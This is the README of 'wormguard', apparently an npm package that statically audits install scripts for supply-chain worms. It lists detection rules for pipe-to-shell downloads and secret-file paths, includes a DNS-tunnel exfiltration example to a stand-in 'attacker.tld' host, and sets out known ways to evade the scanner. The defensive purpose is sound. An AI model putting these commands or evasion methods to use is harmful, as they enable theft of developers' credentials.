Package Exports
- wormguard
- wormguard/corpus
- wormguard/package.json
Readme
wormguard
An offline, AST-grade install-script auditor for npm, pnpm, yarn (classic +
berry), and bun. It performs real JavaScript AST analysis with a small
taint approximation, matches against an offline corpus of confirmed
malicious npm packages (~23k names from the GitHub Advisory Database) and
known C2/exfil endpoints, fingerprints lifecycle scripts of widely-used
native packages so legitimate postinstall work doesn't drown the report,
and detects the Shai-Hulud-class injection pattern (a normally-trusted
package whose install script body suddenly differs from any known-good
fingerprint).
This is not a sandbox, not a CVE scanner, and not a SaaS-backed behavioral monitor. It is defense-in-depth designed to sit alongside those tools.
What it actually does
| Layer | Mechanism | Catches |
|---|---|---|
| Lockfile inventory | Parsers for npm v1/v2/v3, pnpm v6/v7/v9, yarn classic via @yarnpkg/lockfile, yarn berry, bun.lock JSONC |
Package set, integrity, registry hosts, hasInstallScript flag |
| Lifecycle command parsing | shell-quote tokenization across &&, ||, ;, |; resolves node ./script.js and node -e "…" |
curl|sh download-and-run, base64 decode in shell, eval/source, network tools (curl/wget/nc) |
| AST analysis | acorn (the parser used by webpack/rollup/eslint) with acorn-walk, plus a regex fallback for unparseable sources |
eval / new Function / vm.runIn*, dynamic require()/import(), require('http'|'https'|…), fetch(), child_process.* via destructured aliases, process.env reads, secret-path string literals |
| Anti-evasion | Constant folding for +, template literals; decodes Buffer.from(literal, 'base64') and atob(literal) then re-scans the decoded text |
require('ht' + 'tps'), require(`${x}https`), base64-encoded secret paths and network builtin strings |
| Taint approximation | Source categories (env-read, secret-path, crypto-key-read) reaching sink categories (network-builtin, fetch, child-process, shell-pipe) escalates severity one rung |
process.env.NPM_TOKEN flowing into a fetch()/https.request() |
| IoC corpus | Bundled data/iocs.json from the public GHSA type=malware&ecosystem=npm feed (~23 000 names, refreshable via bun run refresh-corpus) plus a curated set of well-attested C2/exfil hostnames |
First-install of a confirmed-malicious npm package even with no baseline |
| Script-fingerprint allowlist | data/script-allowlist.json of sha256s of the lifecycle-script body strings of 28 widely-used native packages (esbuild, sharp, prisma, bcrypt, husky, electron, playwright, …) across all non-deprecated versions |
A worm that replaces the install script of a normally-trusted package — the exact fingerprint drift is reported as critical |
| npm provenance | Reads signatures (registry ECDSA) and dist.attestations (sigstore build provenance) from package-lock.json. Optional verifyBundle() API runs sigstore-js verification on a user-supplied bundle |
Missing/no-attestation → low advisory; explicit verification failure → critical |
| Baseline diff | Snapshot of inventory + script hashes; audit flags newly-added packages, version changes, integrity changes for the same version, and packages that gained a lifecycle script |
Tampering on upgrade |
What it does NOT do
- It is not a sandbox. It does not block or intercept
npm install. To actually prevent a malicious script from running, use@lavamoat/allow-scriptsornpm's ownignore-scripts. wormguard is the auditor that decides whether a given lifecycle script should be allowed. - It is not a CVE scanner. It does not consult NVD/OSV for known
vulnerable versions. Use
osv-scannerornpm auditfor that axis. - It is not a SaaS behavioral monitor. Tools like Socket and Phylum ingest the entire registry continuously and apply ML/behavioral models that no offline tool can match. wormguard's value is precisely that it is small, auditable, deterministic, and runs anywhere.
- It cannot deobfuscate arbitrary JavaScript. It folds simple string concatenation and one layer of base64; it does not constant-fold arbitrary expressions, evaluate the program, or trace data flows across function calls. A determined attacker can still hide a payload from pure static analysis.
Limits and bypasses (read this before depending on it)
This is static AST analysis with a small taint approximation. It is not behavioral observation, not symbolic execution, and not a sandbox. The pipeline is high-leverage against opportunistic supply-chain attacks — the kit-built worm payloads typical of the 2025–2026 npm campaigns, where the same payload is sprayed across dozens of compromised packages and has not been tuned to evade any specific tool. It is derivable-around by an attacker who has read this README. Concretely:
- Variable-resolved
require()/import()—const m = process.env.X; require(m)is flagged asWG-AST-DYNAMIC-REQUIRE(medium), but I do not resolvem. Ifprocess.env.Xwas set elsewhere by the same script, I do not follow that flow. - Native binaries shelled out from a lifecycle script — if
postinstallruns./bin/payloadand the payload is a compiled ELF or Mach-O, I do not analyze binaries. The fingerprint-drift check still catches modifications to the script body, but a binary payload that has always been there will not trigger me on its own. - Multi-stage decode chains — I unwrap one layer of
Buffer.from(literal, 'base64')and re-scan. A two-layer chain (base64 inside hex inside …) is not unwrapped. - Off-host fetched payloads —
curl https://x | shflagsWG-SHELL-PIPE(critical) at the shell level, but I do not fetch the URL or inspect what would arrive over the wire. A payload that is fetched but not piped (curl -o /tmp/x; node /tmp/x) flagsWG-SHELL-NET-DOWNLOAD(high) and the subsequentnode /tmp/xreads/tmp/xif it exists at scan time, but if the URL is fetched at install time only the shell command is visible at scan time. - Timing/conditional payloads —
if (Date.now() > X) malicious()is detected if the AST hits the malicious branch. Static analysis has no notion ofDate.now()returning anything; the malicious branch is always reachable to me. - Cross-file / cross-function taint — the taint approximation is
intra-procedural and largely intra-file.
const t = process.env.SECRETin one module andfetch(url, t)in another (or in a callee I do not inline) are not connected. Splitting the source and the sink across files is a reliable evasion. - WebAssembly payloads — a script that does
WebAssembly.instantiate(bytes)executes logic I never see; I parse JavaScript ASTs, not Wasm bytecode. - DNS-tunnel exfiltration —
dns.resolve('<base64-secret>.attacker.tld')leaks data in the queried hostname. I flag use of thednsbuiltin but do not decode the tunneled payload, and a userland resolver evades even that. - Worker / IPC indirection — moving the act into a
worker_threadsworker, achild_process.fork(), or another process reached over an IPC/socket splits the behaviour across processes I analyse independently. - Write-now, execute-later — a script that only writes a file (a
cron/systemdunit, a shell-rc line, a git hook) and exits is, at scan time, just a filesystem write (WG-AST-FS-WRITE, medium). The execution happens out of band, after the scan, invisible to an install-time static auditor. - The threat model assumes the rules are public. They are. An
attacker that knows the rule list can construct a payload that hits
no rule. This is the structural limit of any heuristic-based detector
with public rules, including, in different ways, every other free
tool in this space. Mitigations: pair with a sandbox
(
@lavamoat/allow-scriptsornpm install --ignore-scripts), pair with a CVE scanner (osv-scanner), and treat wormguard as a defense-in-depth tripwire, not a guarantee.
If your threat model includes targeted attackers who have specifically prepared a payload to evade wormguard, you need runtime sandboxing. This tool does not provide that.
False positives (measured, not asserted)
wormguard targets zero CI-gating (critical/high) false positives on
legitimate code, and that target is measured. Against a 662-package tree
of popular dependencies the current rules produce 0 critical/high and a
small number of medium informational findings. Full methodology,
before/after numbers, the root causes of the false positives that were
fixed, and the honest residual caveats are in
docs/false-positive-baseline.md.
Reproduce on your own tree with bun run scripts/fp-benchmark.ts.
The fuzzy WG-IOC-NEAR rule is intentionally medium, not high: it is a
name-proximity heuristic, so a mid-popularity package one edit from a
known-malicious name can still surface there for manual triage. The exact
corpus match (WG-IOC-NAME) remains critical.
Where it fits
┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐
│ osv-scanner / │ │ LavaMoat │ │ Socket / │
│ npm audit │ │ allow-scripts │ │ Phylum │
│ (CVE database) │ │ (sandbox/block) │ │ (SaaS behavior) │
└────────┬─────────┘ └────────┬─────────┘ └────────┬─────────┘
│ │ │
└──────────┐ ┌─────┴──────┐ ┌─────────┘
│ │ │ │
▼ ▼ ▼ ▼
┌──────────────────────────────┐
│ wormguard │
│ offline AST + IoC corpus + │
│ script fingerprints │
│ (defense-in-depth tripwire) │
└──────────────────────────────┘Install
bun add -d wormguard # or: npm i -D wormguard / pnpm add -D wormguardRequires Node ≥ 20 or Bun ≥ 1.1.
Use
# 1) Scan: AST + IoC + provenance + policy + typosquat
wormguard scan . # human report
wormguard scan . --json # machine-readable
wormguard scan . --ci # exit non-zero if anything ≥ fail severity (default: high)
# 2) Pin a baseline; later, audit for compromise-shaped changes
wormguard snapshot . # writes .wormguard-baseline.json
wormguard audit . --ci # exit non-zero on a worm-shaped diff
# 3) Refresh the bundled IoC corpus (the ONLY network-touching command)
GITHUB_TOKEN=… wormguard refresh # or: bun run refresh-corpus
# 4) Emit a LavaMoat-compatible allowScripts JSON (config bridge)
wormguard emit-allow-scripts . # prints to stdout
wormguard emit-allow-scripts . --out a.json # write to file
# Then embed under "lavamoat.allowScripts" in package.json and install
# @lavamoat/allow-scripts. wormguard's known-good fingerprints become
# allow:true; everything else defaults to deny.Drop wormguard scan . --ci into your pipeline right after npm ci /
pnpm install / yarn install.
Configuration trust model (read this before deploying in CI)
wormguard's whole purpose is to detect malicious code introduced into a project. The threat model therefore assumes that an attacker may already have write access to the project tree (a compromised dependency, a commandeered branch, etc.). Reading config from inside the same project tree would be a confused deputy: the attacker who lands the payload also lands the policy that audits it.
Default behavior:
- wormguard does NOT load
.wormguard.jsonfrom the scanned tree by default. - Config is loaded from, in priority order:
--config FILECLI flag (path resolved at scan time).WORMGUARD_CONFIGenvironment variable (absolute path).
- If a
.wormguard.jsonis present in the scanned tree but neither (a) nor (b) is supplied, wormguard emitsWG-CONFIG-IN-REPO-IGNORED(low) so operators know the file exists and is being ignored. - To opt back into the v0 behavior (e.g. local development, where the
developer trusts their own repo), pass
--trust-repo-config. Do not use this in CI — it re-opens the confused-deputy hole.
Recommended CI pattern:
Place your wormguard policy in a CI-controlled location (a separate secured branch, an org-wide policy repo, or a build-server file), then:
# .github/workflows/audit.yml
- run: bun add -D wormguard
- run: bun wormguard scan . --ci --config ${{ runner.workspace }}/policy/wormguard.jsonA compromised repo cannot influence the path passed to --config from
the workflow.
Configuration — .wormguard.json schema
{
"allowedHosts": ["registry.npmjs.org", "npm.mycorp.example"],
"allowMissingIntegrity": false,
"ignoreRules": ["WG-INVENTORY-ADDED"],
"failSeverity": "high",
"scriptAllowlist": [
{
"package": "my-internal-tool",
"rules": ["WG-AST-CHILD-PROCESS"],
"scriptSha256": "e3b0c4429842…"
}
],
"scriptFingerprints": {
"my-internal-tool": [
"e3b0c4429842c4498…known-good-postinstall-hash",
"9f86d081884c7d6594…known-good-prepare-hash"
]
}
}Granularity is intentional: scriptAllowlist allows rule X for package Y, optionally bound to a specific script-body hash. If the package's
script changes, the suppression no longer applies — which is exactly what
you want.
The legacy allowInstallScripts: ["pkg-a", "pkg-b"] (whole-package
suppression) is parsed for backward compatibility and emits a deprecation
notice.
Rule reference
| id | severity | meaning |
|---|---|---|
| WG-IOC-NAME | critical | package version is in a confirmed-malicious range from the GHSA type=malware corpus |
| WG-WORM-PROPAGATE | critical | lifecycle script writes to package.json AND invokes npm publish (Shai-Hulud-style self-propagation primitive) |
| WG-IOC-NAME-LEGACY | medium | package name is in the GHSA corpus but the installed version cannot be confirmed inside the affected range (or no version was supplied) |
| WG-IOC-NEAR | high | package name is 1 edit from a confirmed-malicious npm package (likely typosquat of a known-malicious package) |
| WG-IOC-SCRIPT-HASH | critical | sha256 of a lifecycle script body matches a known-malicious fingerprint |
| WG-IOC-DOMAIN | critical | lifecycle script source references a known C2/exfil hostname |
| WG-SCRIPT-FINGERPRINT-DRIFT | critical | known-good package whose lifecycle-script body hash differs from every accepted fingerprint (worm-injection signature) |
| WG-SHELL-PIPE | critical | lifecycle command pipes content into a shell |
| WG-AST-SHELL-PIPE | critical | inline JS inside node -e … pipes into a shell |
| WG-DIFF-INTEGRITY | critical | integrity changed for the same version (content tampering) |
| WG-DIFF-SCRIPT-BODY | critical | lifecycle script BODY changed for the same version (worm-injection on disk) |
| WG-PROVENANCE-INVALID | critical | sigstore or registry-signature verification failed |
| WG-AST-EVAL | high (→critical with taint) | eval / new Function / vm.runIn* |
| WG-AST-CONCAT-EVAL | high | feeds a non-literal value to eval (obfuscation) |
| WG-AST-NETWORK-BUILTIN | high (→critical with taint) | require('http'/'https'/'net'/'tls'/'dns'/'dgram') |
| WG-AST-FETCH | high (→critical with taint) | fetch() |
| WG-AST-SECRET-PATH | high | string literal references .npmrc/.aws/.ssh/.netrc/id_rsa/etc |
| WG-AST-CRYPTO-KEY | high | reads/uses cryptographic private-key material |
| WG-SHELL-NET-DOWNLOAD | high | curl/wget/nc invoked from the lifecycle command |
| WG-SHELL-EVAL | high | shell-level eval or source |
| WG-DIFF-NEW-SCRIPT | high | package gained a lifecycle script since baseline |
| WG-DIFF-REGISTRY | high | resolved URL / registry host changed for the same version |
| WG-INSECURE-RESOLVED | high | resolved over http:// |
| WG-TYPOSQUAT | high/medium | name within Damerau-Levenshtein 1–2 of a popular package |
| WG-AST-CHILD-PROCESS | medium (→high with taint) | spawns a child process |
| WG-AST-FS-WRITE | medium | writes to the filesystem |
| WG-AST-BASE64 | medium | decodes base64 (decoded body is re-scanned for further indicators) |
| WG-AST-DYNAMIC-REQUIRE | medium | require()/import() with non-literal argument |
| WG-AST-PARSE-FAILED | medium | acorn could not parse; regex fallback used |
| WG-SHELL-BASE64 | medium | shell-level base64 -d / openssl enc -d |
| WG-NO-INTEGRITY | medium | missing integrity hash |
| WG-UNKNOWN-REGISTRY | medium | resolved from a non-allowed registry host |
| WG-AST-ENV-READ | low (→medium with taint) | reads process.env |
| WG-INSTALL-SCRIPT | low | advisory: package defines lifecycle scripts |
| WG-INSTALL-SCRIPT-ALLOWLISTED | low | every lifecycle body matches a bundled known-good fingerprint |
| WG-PROVENANCE-MISSING | low | no registry signatures and no build provenance |
| WG-PROVENANCE-NO-ATTESTATION | low | registry-signed but no npm publish --provenance attestation |
| WG-PROVENANCE-EXPIRED-KEY | low | registry signature verifies, but the signing key has since expired |
| WG-PROVENANCE-NO-KEYS | medium | bundled npm registry public keys are unavailable; cannot verify |
| WG-NO-PREVENTION-LAYER | low | a lockfile is present (project installs deps) but no install-time prevention layer is configured (@lavamoat/allow-scripts, ignore-scripts=true in .npmrc, enableScripts: false in .yarnrc.yml, or pnpm onlyBuiltDependencies). wormguard reports findings; you also need a prevention layer to block. |
| WG-CONFIG-IN-REPO-IGNORED | low | found .wormguard.json in the scanned tree but ignoring it (default trust model) |
| WG-CONFIG-MISSING | medium | --config FILE or WORMGUARD_CONFIG was supplied but the file is missing or invalid |
| WG-YARN-PNP-NO-NODE-MODULES | medium | yarn-berry lockfile present but no node_modules (PnP mode) |
| WG-DIFF-ADDED / -REMOVED / -VERSION | low | inventory changes since baseline |
Library API
import { scan, snapshot, diff, inventoryOf, meetsFail } from "wormguard";
import { matchPackageName, matchDomains } from "wormguard/corpus";
const { findings, counts, lockfilesUsed } = scan(process.cwd());
if (meetsFail(findings, "high")) process.exit(1);
// Direct corpus matching (offline, no network):
matchPackageName("definitely-malicious-pkg"); // → critical Finding | null
matchDomains(sourceText); // → string[] of IoC domainsThreat model
wormguard catches:
- A new version of a previously-trusted package whose install script body
has changed away from any known-good fingerprint (the worm-injection
signature:
WG-SCRIPT-FINGERPRINT-DRIFT). - An install script that — after AST-based deobfuscation — uses
eval/new Function, dynamicrequire(), network builtins,fetch(),child_process, secret-path literals, or cryptographic key reads. - An install script whose execution chain reaches a network sink with a
source from
process.env/secret paths/private keys (taint escalation). - A lifecycle command that pipes a download into a shell, base64-decodes
in shell, or runs
eval/source. - A package whose name appears in the GHSA
type=malwarecorpus (≈23 000 entries, refreshable). - A lifecycle source referencing a known C2/exfil hostname.
- A baseline diff: new install script, integrity change for an unchanged version, registry change, added/removed/version-changed packages.
- An npm package without provenance attestation (low advisory; combined with a lifecycle script in a worm-target name space, the score adds up).
It does not catch:
- A known-CVE in a package whose installation looks normal (use
osv-scanner/npm audit). - Malicious behavior triggered at runtime rather than at install time (use Socket/Phylum, or LavaMoat at runtime).
- Heavily obfuscated JS payloads beyond one layer of constant folding + base64.
- Anything that requires sandboxing or blocking; wormguard reports, your CI gate decides.
How verification works (and what does NOT happen)
The 154 tests are committed at test/*.test.ts and are reproducible by any
clone with bun test. The CI workflow runs them on Ubuntu and macOS on
every push/PR. Real-world fixtures used by the cryptographic-verification
tests (test/fixtures/provenance/sigstore-3.1.0.json,
test/fixtures/provenance/lodash-4.17.21.json) are committed bytes
captured from the public npm registry — anyone can re-fetch them and
diff to confirm they have not been tampered with.
There is no AI self-validation in this project. Earlier drafts of the repository contained an automated "validator" report produced by the same agent that wrote the code; that file was deleted in v1 because an automated validator validating itself is not independent in any useful sense. The current verification surface is:
- The committed test suite (
bun test). - The committed real-world fixtures used by the cryptographic verification tests.
- The CI workflow that re-runs both on a clean machine on every push.
- The bundled reference data files (see the next section), each with a
top-level
fetchedAtfield documenting when they were regenerated.
If you want a third-party audit, run the test suite yourself, diff the
fixtures against the public registry, and read the rules in
src/ast/analyzer.ts and src/ast/orchestrate.ts. Every rule is small
enough to read and has a corresponding test.
Reference data (provenance and refresh)
| File | Source | Refresh command |
|---|---|---|
data/iocs.json |
GitHub Advisory Database (type=malware&ecosystem=npm) via the public REST API |
bun run refresh-corpus |
data/script-allowlist.json |
npm registry packument for ~60 curated packages with legitimate lifecycle scripts; sha256 of every distinct script body across non-deprecated versions | bun run refresh-allowlist |
data/top-names.json |
ecosyste.ms "most depended on" view of the npm registry (sorted descending by dependent-package count); used as typosquat reference targets | bun run refresh-top-names |
data/npm-registry-keys.json |
https://registry.npmjs.org/-/npm/v1/keys (npm registry's public ECDSA P-256 signing keys); used to verify per-package registry signatures |
manual re-fetch when npm publishes a new key |
All four data files have a top-level fetchedAt ISO timestamp and a
source field (where applicable) documenting their public origin. The
refresh scripts are the only network-touching code in the project.
Status & roadmap
V1 (this branch): AST analyzer, IoC corpus (GHSA), provenance reader and sigstore verifier, script-fingerprint allowlist with drift detection, multi-PM lockfile parsing, granular config, baseline diff, typosquat, integrity/registry policy, CLI + JSON + CI codes.
Roadmap:
- Sigstore bundle auto-discovery from the local npm cache (
~/.npm/_cacache/). - Optional online enrichment (
wormguard scan --onlineto fetch attestations from the registry and verify them in-line; today, bundles must be supplied toverifyBundleexplicitly). - Bigger curated script-fingerprint allowlist (community PRs).
- Bigger curated IoC corpus refresh on a CI schedule.
- pnpm/yarn
hasInstallScriptextraction directly from each lockfile's metadata (today, the field is filled in by the node_modules walker).
Out of scope (not on the roadmap, by design):
- Runtime sandboxing or blocking: that is the job of
@lavamoat/allow-scripts/npm install --ignore-scripts. wormguard reports; your CI gate + prevention layer block. We do not plan to integrate with LavaMoat at the runtime level — they coexist cleanly without it. Seewormguard emit-allow-scriptsbelow for a one-shot config bridge.
License
MIT. See LICENSE.